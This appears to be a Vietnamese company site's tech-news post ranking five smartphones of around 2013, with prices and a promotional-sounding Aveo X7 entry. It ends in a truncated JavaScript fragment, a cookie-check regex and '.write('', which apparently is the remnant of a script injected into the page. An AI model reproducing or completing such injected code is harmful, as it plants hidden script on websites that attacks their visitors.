Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > 5 chiếc smartphone đáng tiền nhất hiện nay

5 chiếc smartphone đáng tiền nhất hiện nay

Thị trường điện thoại di động Việt đang tràn ngập các mẫu smartphone cao cấp, trong số đó có rất nhiều sản phẩm mới chỉ ra mắt trong vài tháng trở lại đây.

1. iPhone 5

iPhone 5 sở hữu thiết kế khá ấn tượng

Sản phẩm này là sự lựa chọn tốt nhất dành cho số đông người dùng. Các ứng dụng tốt nhất sẽ có mặt trên iPhone đầu tiên và Apple luôn kịp thời tung ra các bản cập nhật phần mềm với nhiều tính năng mới nhất cho mẫu smartphone mới nhất của mình.

Giá bán iPhone 5 chính hãng bản 64GB Quốc tế là 15.200.000 VND.

2. HTC One

HTC One

Mẫu điện thoại chạy Android tốt nhất trên thị trường hiện nay thuộc về HTC ONe. Nếu người dùng nào không thích Apple, thì HTC One sẽ là sự lựa chọn sáng suốt. Máy có thân hình ki loại tuyệt đẹp, màn hình cảm ứng 4.7 inch Full HD và hoạt động trên hệ điều hành phiên bản Android mới nhất. Người dùng sẽ cảm thấy thích thú và muốn sở hữu ngay một chiếc HTC One ngay khi họ tiếp xúc với nó.

HTC One có giá chính hãng là 16 triệu đồng.

3. Google Nexus 4

Google Nexus 4

Google đã đặt hàng LG sản xuất ra mẫu đầu bảng mới nhất của mình Nexus 4. Nếu như bạn đang tìm kiếm một trải nghiệm Android bản nguyên thủy tuyệt vời nhất, thì đây là chiếc smartphone duy nhất mà bạn nên cân nhắc, xem xét. Điểm trừ duy nhất của chiếc smartphone này đấy chính là không hỗ trợ mạng 4G, với người dùng ở Việt Nam thì đây không phải là một vấn đề quá lớn.

Hiện Nexus 4 có giá bán khoảng 8,5 triệu đồng (hàng xách tay).

4. Samsung Galaxy S4

Siêu phẩm Samsung Galaxy S4

Kể từ khí chính thứ lên kệ, mẫu điện thoại đầu bảng mới nhất của Samsung đã có sức hút rất lớn đối với đa số người dùng. Tuy vậy, phần lớn các đánh giá của người dùng dành cho Samsung Galaxy S4 đều cho thấy một sự thất vọng rõ rệt đối với siêu phẩm này.

Chúng ta cũng không thể phủ nhận rằng Galaxy S4 là một mẫu smartphone Android chất lượng cao, song chiếc máy này lại có quá nhiều tính năng thừa, hoạt động không tốt, chẳng hạn như cử chỉ không cần chạm tay. S4 được sản xuất từ chất liệu nhựa rẻ tiền, trong thời đại mà phần lớn các mẫu smartphone đầu bảng đều sử dụng chất liệu kim loại rất bền và sang trọng.

Hàng chính hãng S4 có giá 14.200.00- VND (đối với hàng công ty).

5. Aveo X7 Full HD

Sau sự thành công của Series máy Aveo Note 2, AVAtelecom tiếp tục Aveo X7 – chiếc smartphone được kỳ vọng dẫn đầu xu thế công nghệ ở phân khúc giá rẻ.

Điện thoại Aveo X7 Full HD

Sản phẩm sở hữu màn hình Full HD 5 inch với độ nét cáo, độ phân giải 1920 x 1080p mà chỉ ở mức giá trên 10 triệu mới có được, cấu hình CPU lõi tứ 1.2 GHz với 4 kênh chạy độc đáo, RAM đa luồng DDR3 dung lượng 1GB, camera 16 Mpx HDLens, hoạt động trên hệ điều hành Andorid 4.2.1 cao nhất trên thị trường…. Có thể nói Aveo X7 tổng hòa gần như tất cả những gì mới nhất, mạnh nhất trong phân khúc của mình. Điều bất ngờ trong những phút cuối cùng của cuộc họp báo ra mắt sản phẩm, đại diễn của hãng đã công bố mức giá niêm yết chỉ có 5.3 triệu, đi kèm với những ưu đãi khác.

Không chỉ bảo hành thân máy 12 tháng mà màn hình của máy cũng được bảo hành 12 tháng thay vì 1 tháng hoặc không được bảo hành như những dòng máy khác, giúp người dùng yên tâm hơn khi sử dụng máy. Ngoài ra, khách hàng còn được quyền sử dụng máy trong 1 tuần đầu tiên, nếu xảy ra vẫn đề lỗi hỏng sẽ được đổi 1 chiếc máy mới. Pin của sản phẩm này cũng được có chế độ bảo hành 6 tháng.

  (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘